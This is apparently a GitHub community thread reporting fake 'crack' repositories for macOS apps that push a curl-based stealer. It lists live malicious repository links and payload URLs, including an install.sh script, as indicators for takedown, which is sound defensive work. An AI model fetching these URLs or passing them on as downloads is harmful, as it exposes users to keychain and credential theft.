Batch Malware Report: Fake "Crack" app malware.

[ProgMEM-CC]

Select Topic Area

General

Body

There have been a lot of malware disguising themselves as "NotchNook crack for macos free download" or "NotchNook no payment free" or "Notchnook free license", but in the backend just tricks the user to perform a bash curl attack, most of which download an "update file" from https://phannarith.com/get${x}/update with x being a number, so far i have seen x as 4 or three.

The update file uses the stolen credentials to unlock the macos kechain, which is a major security risk.

There is also some password encryped archives as a malsare to prevent detection, mainly for windows.

Here are some of the infringing repositories:

https://github.com/NotchNook-Mac-Download/NotchNook-Mac-Download?tab=readme-ov-file (fake notchnook "crack", atom stealer and dropper.)

https://gist.github.com/sioresitoy2/75361b23517ebdbca8f182471e485c4b ( Lumma mulware )

https://github.com/Bartender-for-Mac/ (atom stealer, bartender fake "crack", same phannarith domain. )

https://github.com/Bartender-4-Download ( same malware atom stealer, same domain)

Here are the malicious domains:

https://veitzeatz.com/get4/install.sh
https://phannarith.com/get${x}/update

If anyone finds more malware, please report or comment it so it can be taken down.

Thanks.

[ProgMEM-CC]

Also i put this here instead of the report email/button so as to batch report and allow others to report too.

[ispyboy]

Yeah, it’s a big problem. On usersdrive (usersdrive.com) there are lots of scams like this one, using a curl attack (curl -fS SL or something like that) to trick the downloader into thinking that running the command will allow them to receive free apps, etc. Thanks for bringing this up :D

[ispyboy]

Btw if that link doesn’t work it may be something like usersdrive.cc or something :)

[Akash1134]

Hi @ProgMEM-CC , 👋🏻 We really appreciate you flagging this. The best route to get this to the proper GitHub team is to use our abuse reporting tools. Here's all the info:

• Reporting abuse or spam
• Reporting a user
• Reporting an issue or pull request
• Reporting a comment

You can report behavior and content that violates community guidelines and terms. We are going to close this post, but for this and any future incidents, please refer to the links above.

Thank you!